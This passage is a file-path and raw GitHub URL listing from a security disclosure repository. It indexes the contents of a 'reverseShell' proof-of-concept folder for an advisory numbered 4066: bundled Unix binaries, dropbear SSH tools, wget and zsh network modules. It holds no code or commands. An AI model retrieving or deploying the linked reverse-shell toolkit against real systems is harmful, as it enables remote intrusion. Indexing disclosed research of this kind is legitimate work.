4066/poc/reverseShell/usr/bin/false -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/find: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/find -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/fs_usage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/fs_usage -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/grep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/grep -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/gunzip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/gunzip -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/gzip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/gzip -------------------------------------------------------------------------------- /SSD 
Advisory - 4066/poc/reverseShell/usr/bin/head: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/head -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/hexdump: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/hexdump -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/hostinfo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/hostinfo -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/id: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/id -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/killall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/killall -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/less: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/less -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/login: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/login -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/lsmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/lsmp -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/more: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/more -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/nano: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/nano -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/nohup: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/nohup -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/passwd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/passwd -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/plconvert: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/plconvert -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/printf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/printf -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/renice: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/renice -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/reset: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD 
Advisory - 4066/poc/reverseShell/usr/bin/reset -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/sc_usage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/sc_usage -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/scp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/scp -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/screen: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/screen -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/script: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/script -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/sed: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/sed -------------------------------------------------------------------------------- 
/SSD Advisory - 4066/poc/reverseShell/usr/bin/seq: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/seq -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/split: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/split -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/sqlite3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/sqlite3 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/stat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/stat -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/syslog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/syslog -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/tail: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/tail -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/tar -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/tee: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/tee -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/time: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/time -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/true: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/true -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/tset: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/tset -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/uname: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/uname -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/vim: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/vim -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/vm_stat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/vm_stat -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/wc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/wc -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/what: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 
4066/poc/reverseShell/usr/bin/what -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/which: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/which -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/xargs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/xargs -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/xxd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/xxd -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/.DS_Store -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/bin/dbclient: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/bin/dbclient 
-------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/bin/dropbear: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/bin/dropbear -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/bin/dropbearconvert: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/bin/dropbearconvert -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/bin/dropbearkey: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/bin/dropbearkey -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/bin/filemon: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/bin/filemon -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/bin/jtool: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/bin/jtool 
-------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/bin/procexp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/bin/procexp -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/bin/wget: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/bin/wget -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/.DS_Store -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/.DS_Store -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/.DS_Store 
-------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/attr.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/attr.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/cap.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/cap.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/clone.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/clone.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/compctl.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/compctl.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/complete.so: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/complete.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/complist.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/complist.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/computil.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/computil.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/curses.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/curses.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/datetime.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/datetime.so -------------------------------------------------------------------------------- /SSD Advisory - 
4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/deltochar.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/deltochar.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/example.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/example.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/files.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/files.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/langinfo.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/langinfo.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/mapfile.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 
4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/mapfile.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/mathfunc.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/mathfunc.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/newuser.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/newuser.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/parameter.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/parameter.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/regex.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/regex.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/socket.so: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/socket.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/stat.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/stat.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/system.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/system.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/tcp.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/tcp.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/termcap.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/termcap.so -------------------------------------------------------------------------------- /SSD Advisory - 
4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/terminfo.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/terminfo.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zftp.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zftp.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zle.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zle.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zleparameter.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zleparameter.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zprof.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 
4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zprof.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zpty.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zpty.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zselect.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zselect.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zutil.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zutil.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/sbin/chown: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/sbin/chown -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/sbin/ioreg: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/sbin/ioreg -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/sbin/kextstat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/sbin/kextstat -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/sbin/ltop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/sbin/ltop -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/sbin/netstat: -------------------------------------------------------------------------------- 